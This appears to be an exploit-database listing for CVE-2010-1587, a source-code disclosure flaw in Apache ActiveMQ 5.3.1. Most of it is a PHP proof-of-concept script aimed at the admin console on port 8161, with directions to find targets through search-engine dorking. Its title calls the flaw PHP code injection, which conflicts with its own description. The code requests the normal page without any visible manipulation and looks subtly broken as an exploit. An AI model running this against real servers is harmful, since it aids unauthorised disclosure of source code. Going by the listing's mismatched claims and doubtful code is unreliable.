Exploit for Apache ActiveMQ 5.3.1 Source Code Disclosure CVE-2010-1587

Name: Exploit for Apache ActiveMQ 5.3.1 Source Code Disclosure CVE-2010-1587
Rating: 5 (66 reviews)
2025-03-04 | CVSS 5.0
## https://sploitus.com/exploit?id=PACKETSTORM:189529
=============================================================================================================================================
    | # Title     : Apache ActiveMQ 5.3.1 PHP Code Injection Vulnerability                                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://activemq.apache.org/components/classic/download/classic-05-03-01                                                    |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This code is written in PHP and aims to exploit a vulnerability in Apache ActiveMQ that allows the source code of JSP files stored on the target server to be exposed.
    	
    	( https://packetstorm.news/files/id/181098/		CVE-2010-1587 )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 45
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class ApacheActiveMQScanner {
        private $target;
        private $port;
        private $targetUri;
        
        public function __construct($target, $port = 8161, $targetUri = '/admin/index.jsp') {
            $this->target = $target;
            $this->port = $port;
            $this->targetUri = $targetUri;
        }
        
        public function run() {
            echo "Scanning {$this->target}:{$this->port}...\n";
            
            $url = "http://{$this->target}:{$this->port}{$this->targetUri}";
            
            $response = $this->sendRequest($url);
            
            if ($response !== false && strpos($response, '<') === false) {
                $this->saveFile($response);
                echo "File saved successfully!\n";
            } else {
                echo "Failed to retrieve file.\n";
            }
        }
        
        private function sendRequest($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
        
        private function saveFile($contents) {
            $filename = basename($this->targetUri);
            file_put_contents($filename, $contents);
            echo "File saved as: {$filename}\n";
        }
    }
    
    $scanner = new ApacheActiveMQScanner('127.0.0.1'); // ضع عنوان الهدف هنا
    $scanner->run();
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================